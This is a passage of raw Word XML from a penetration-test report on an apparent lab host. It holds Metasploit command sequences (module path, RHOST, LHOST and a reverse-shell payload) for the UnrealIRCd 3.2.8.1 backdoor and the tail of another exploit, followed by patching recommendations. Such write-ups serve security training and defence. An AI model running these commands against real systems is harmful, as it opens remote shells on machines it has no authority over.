          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set LHOST &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>your_kali_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Result: Reverse shell gained successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9EFE8C" wp14:editId="18BF9DAC">
            <wp:extent cx="4352925" cy="2345278"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133627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5174" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4369111" cy="2353999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63053A62" wp14:editId="283E6612">
            <wp:extent cx="4438650" cy="2391465"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="2376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265" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4453348" cy="2399384"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338E6C79" wp14:editId="67A1A589">
            <wp:extent cx="4533900" cy="2442784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210763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35165" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4543823" cy="2448130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Port:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6667/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2.8.1 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Module</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set RHOST 192.168.74.154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set LHOST &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>your_kali_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit executed, backdoor triggered (no interactive shell created in first attempt – further tuning required).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00A61973" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7C2A62" wp14:editId="5BC90A93">
            <wp:extent cx="4781550" cy="2576213"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44640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0071" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4806510" cy="2589661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A61973" w:rsidRPr="00A61973" w:rsidRDefault="00A61973" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A762B30" wp14:editId="51F7F777">
            <wp:extent cx="4876800" cy="2627532"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="140912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28249" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890259" cy="2634783"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Findings and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00A61973">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerable to a known backdoor; upgrade or remove this version immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00A61973">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.X–4.X:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Patch or upgrade to a secure version; disable guest access if unnecessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00A61973">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2.8.1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Replace with a non-compromised version; verify integrity of packages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF3697" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This penetration test demonstrated three critical vulnerabilities that allowed unauthorized access or backdoor exploitation. Immediate patching and system hardening are advised.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CF3697" w:rsidRPr="00A61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41F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6D20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737268"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A4297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0500367">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1862625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E63"/>
    <w:rsid w:val="00230E63"/>
    <w:rsid w:val="00365433"/>
    <w:rsid w:val="00704A64"/>
    <w:rsid w:val="008668B5"/>
    <w:rsid w:val="00955A9B"/>
    <w:rsid w:val="00A61973"/>
    <w:rsid w:val="00BE6C81"/>
    <w:rsid w:val="00CF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A4E50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{27BDC07F-13F3-43F8-BE37-7CB1603D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E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0E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0E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0E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0E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0E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E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0E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0E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0E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0E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0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E63"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00230E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E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E63"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00230E63"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00230E63"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00230E63"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
